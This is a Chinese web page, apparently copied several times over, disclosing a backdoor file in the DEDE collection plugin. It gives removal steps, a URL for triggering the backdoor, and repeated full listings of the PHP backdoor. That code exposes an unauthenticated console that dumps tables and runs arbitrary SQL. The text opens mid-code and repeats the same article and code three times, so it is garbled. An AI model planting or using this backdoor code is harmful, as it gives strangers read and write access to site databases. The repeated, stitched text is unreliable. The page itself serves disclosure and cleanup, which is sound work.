"失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

2.DEDE采集大师官方留后门的删除办法。

DEDE采集大师官方留后门的删除办法去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" onClick="this.form.dopost.value=\'opimize\';" /> <br /> <input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" onClick="this.form.dopost.value=\'repair\';" style="margin-top:6px;" /> <br /> <input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" onClick="this.form.dopost.value=\'viewinfo\';" style="margin-top:6px;" /> </div> <div style="float:left"> <input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" onClick="this.form.dopost.value=\'opimizeAll\';" /> <br /> <input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" onClick="this.form.dopost.value=\'repairAll\';" style="margin-top:6px;" /> </div> </td> </tr> </table></td> </tr> <tr> <td height="200" align="center">返回信息:</td> <td> <iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> </td> </tr> </form> <form action="" method="post" name="form1" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'query\'> <tr> <td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行: <input name="querytype" type="radio" class="np" value="0"> 单行命令(支持简单查询) <input name="querytype" type="radio" class="np" value="2" checked> 多行命令</strong></td> </tr> <tr> <td height="118" colspan="2"> <textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> </td> </tr> <tr> <td height="53" align="center"></td> <td> <input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class=\'np\' /> </td> </tr> </form> </table> </td> </tr> </table> </body> </html> ';} ?>

3.DEDE采集大师官方留后门的删除办法。

去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法: http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo 输入以上网址,即可打开后门界面。 说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下: 复制代码 代码如下: <?php require_once(dirname(__FILE__)."/../include/common.inc.php"); if(emptyempty($dopost)) { $dopost = ""; } if($dopost=="rename") { if(rename('dedesql.query.php','arc.sqlquery.class.php')){ echo "成功!"; }else{ echo "失败!"; } exit(); } if($dopost=="viewinfo") { if(emptyempty($tablename)) { echo "没有指定表名!"; } else { $dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); $dsql->Execute('me'); $row2 = $dsql->GetArray('me',MYSQL_BOTH); $ctinfo = $row2[1]; echo "<xmp>".trim($ctinfo)."</xmp>"; } exit(); } if($dopost=="index") { require_once(DEDEINC.'/arc.partview.class.php'); $envs = $_sys_globals = array(); $envs['aid'] = 0; $pv = new PartView(); $row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); $templet = str_replace("{style}",$cfg_df_style,$row['templet']); $homeFile = dirname(__FILE__).'/'.$row['position']; $homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); $fp = fopen($homeFile,'w') or die("无法更新网站主页到:$homeFile 位置"); fclose($fp); $tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; $pv->SetTemplet($tpl); $pv->SaveToHtml($homeFile); $pv->Close(); echo "成功更新首页!"; exit(); } else if($dopost=="query") { $sqlquery = trim(stripslashes($sqlquery)); if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) { echo "<span style='font-size:10pt'>删除'数据表'或'数据库'的语句不允许在这里执行。</span>"; exit(); } if(eregi("^select ",$sqlquery)) { $dsql->SetQuery($sqlquery); $dsql->Execute(); if($dsql->GetTotalRow()<=0) { echo "运行SQL:{$sqlquery},无返回记录!"; } else { echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!"; } $j = 0; while($row = $dsql->GetArray()) { $j++; if($j>100) { break; } echo "<hr size=1 width='100%'/>"; echo "记录:$j"; echo "<hr size=1 width='100%'/>"; foreach($row as $k=>$v) { echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n"; } } exit(); } if($querytype==2) { $sqlquery = str_replace("\r","",$sqlquery); $sqls = split(";[ \t]{0,}\n",$sqlquery); $nerrCode = "";$i=0; foreach($sqls as $q) { $q = trim($q); if($q=="") { continue; } $dsql->ExecuteNoneQuery($q); $errCode = trim($dsql->GetError()); if($errCode=="") { $i++; } else { $nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>"; } } echo "成功执行{$i}个SQL语句!<br><br>"; echo $nerrCode; } else { $dsql->ExecuteNoneQuery($sqlquery); $nerrCode = trim($dsql->GetError()); echo "成功执行1个SQL语句!<br><br>"; echo $nerrCode; } exit(); } if($dopost=="view") { ;echo '<html> <head> <meta http-equiv=\'Content-Type\' content=\'text/html; charset=gb2312\'> <title>SQL命令行工具</title> <link href=\'img/base.css\' rel=\'stylesheet\' type=\'text/css\'> </head> <body background=\'img/allbg.gif\' leftmargin=\'8\' topmargin=\'8\'> <table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> <tr> <td height="19" background="img/tbg.gif"> <table width="96%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="24%"><strong>SQL命令运行器:</strong></td> <td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b> | <b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b> </td> </tr> </table> </td> </tr> <tr> <td height="200" bgcolor="#FFFFFF" valign="top"> <table width="100%" border="0" cellspacing="4" cellpadding="2"> <form action="" method="post" name="infoform" target="stafrm"> <input type=\'hidden\' name=\'dopost\' value=\'viewinfo\' /> <tr bgcolor="#F3FBEC"> <td width="15%" height="24" align="center">系统的表信息:</td> <td> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="35%"> <select name="tablename" id="tablename" style="width:100%" size="6"> '; $dsql->SetQuery("Show Tables"); $dsql->Execute('t'); while($row = $dsql->GetArray('t',MYSQL_BOTH)) { $dsql->SetQuery("Select count(*) From ".$row[0]); $dsql->Execute('n'); $row2 = $dsql->GetArray('n',MYSQL_BOTH); $dd = $row2[0]; echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>\r\n"; } ;echo ' </select> </td> <td width="2%"></td> <td width="63%" valign="bottom"> <div style="float:left;margin-right:20px;"> <input type="Submit" name="Submit1" value="优化选中表" class="coolbg 